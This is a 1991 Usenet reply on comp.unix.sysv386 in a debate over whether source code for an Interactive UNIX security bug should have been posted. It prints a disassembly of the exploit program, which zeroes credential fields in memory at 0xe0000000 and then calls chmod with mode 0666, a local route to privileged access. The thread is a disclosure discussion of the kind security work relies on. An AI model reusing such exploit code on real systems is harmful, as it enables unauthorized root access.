Path: utzoo!utgpu!news-server.csri.toronto.edu!bonnie.concordia.ca!uunet!fub!dobag.in-berlin.de!lumpi
From: lumpi@dobag.in-berlin.de (Joern Lubkoll)
Newsgroups: comp.unix.sysv386
Subject: Re: SECURITY BUG IN INTERACTIVE UNIX SYSV386
Keywords: BAD BUG
Message-ID:
Date: 16 Feb 91 11:46:20 GMT
References: <1991Feb12.085747.8468@specialix.co.uk> <27B93F44.5606@tct.uucp> <6027@unix386.Convergent.COM> <1991Feb15.134715.16979@virtech.uucp>
Organization: Dobag Computer Systems Berlin
Lines: 47

cpcahil@virtech.uucp (Conor P. Cahill) writes:

> 2. I wholeheartedly DISAGREE with you posting the source code which
> performs the security bypass. You could have just posted the
> uuencoded binary which would have been enough to prove your point
> without making it extremely easy for any two bit user to obtain
> privileged access. Yes a dedicated hacker could have decoded
> your explanation and/or the binary and figure out how to replicate
> your code, but the number of those is MUCH less than the number
> of people who can now violate the security of the system using
> your posted code.
>
> POSTING THE CODE WAS DEAD WRONG.

Everyone able to use a debugger or the disassembler will be able to get the information out of the binary!
Let's look at the disassembly (done on ISC 2.21):

--- BEGINS HERE ---

                        **** DISASSEMBLER ****

disassembly for toete

section .text

[startup code deleted]

     11e:  c7 45 fc 00 00 00 e0          movl    $0xe0000000,0xfc(%ebp)
     125:  8b 45 fc                      movl    0xfc(%ebp),%eax
     128:  66 c7 80 ea 10 00 00 00 00    movw    $0x0,0x10ea(%eax)
     131:  8b 45 fc                      movl    0xfc(%ebp),%eax
     134:  66 c7 80 ec 10 00 00 00 00    movw    $0x0,0x10ec(%eax)
     13d:  8b 45 fc                      movl    0xfc(%ebp),%eax
     140:  66 c7 80 ee 10 00 00 00 00    movw    $0x0,0x10ee(%eax)
     149:  8b 45 fc                      movl    0xfc(%ebp),%eax
     14c:  66 c7 80 f0 10 00 00 00 00    movw    $0x0,0x10f0(%eax)
     155:  68 b6 01 00 00                pushl   $0x1b6
     15a:  68 a0 03 40 00                pushl   $0x4003a0
     15f:  e8 0c 00 00 00                call    0xc <170>        /* CHMOD */
     164:  83 c4 08                      addl    $0x8,%esp
     167:  c9                            leave
     168:  c3                            ret

[Library functions deleted]

Don't you think this is enough for anyone to see what's going on?

jl
--
lumpi@dobag.in-berlin.de -- "Nothing is the complete absence of everything."